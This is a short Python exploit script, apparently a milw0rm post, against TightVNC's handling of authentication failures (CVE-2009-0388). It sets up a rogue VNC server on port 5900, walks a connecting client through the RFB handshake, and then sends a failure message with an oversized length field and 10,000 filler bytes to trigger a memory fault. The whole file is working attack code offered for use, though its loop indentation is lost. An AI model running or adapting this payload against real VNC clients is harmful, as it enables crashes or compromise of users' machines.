#!/usr/bin/env python
#digital.desi@in.com
# Modified Andres Lopez Luksenberg's exploit for Authentication Failure scenario in TightVNC. BID 33569 CVE-2009-0388
import socket
serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
serversocket.bind(('', 5900))
serversocket.listen(1)
while True:
clientsocket, clientaddres = serversocket.accept()
data = 'RFB 003.008\n'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
print data_cli
data = '\x02\x02\x10'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
data = '\x00'*4
clientsocket.sendall(data)
data = ('\x00'*3)+'\x01'
clientsocket.sendall(data)
data = ('\x00'*3)+'\x02STDVVNCAUTH_'
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
data = ('\x01'*16)
clientsocket.sendall(data)
data_cli = clientsocket.recv(1024)
data = '\x00\x00\x00\x01'
clientsocket.sendall(data)
data = '\xf0\xff\xff\xff'
clientsocket.sendall(data)
data = 'A'*10000
clientsocket.sendall(data)
clientsocket.close()
serversocket.close()
# milw0rm.com [2009-02-09]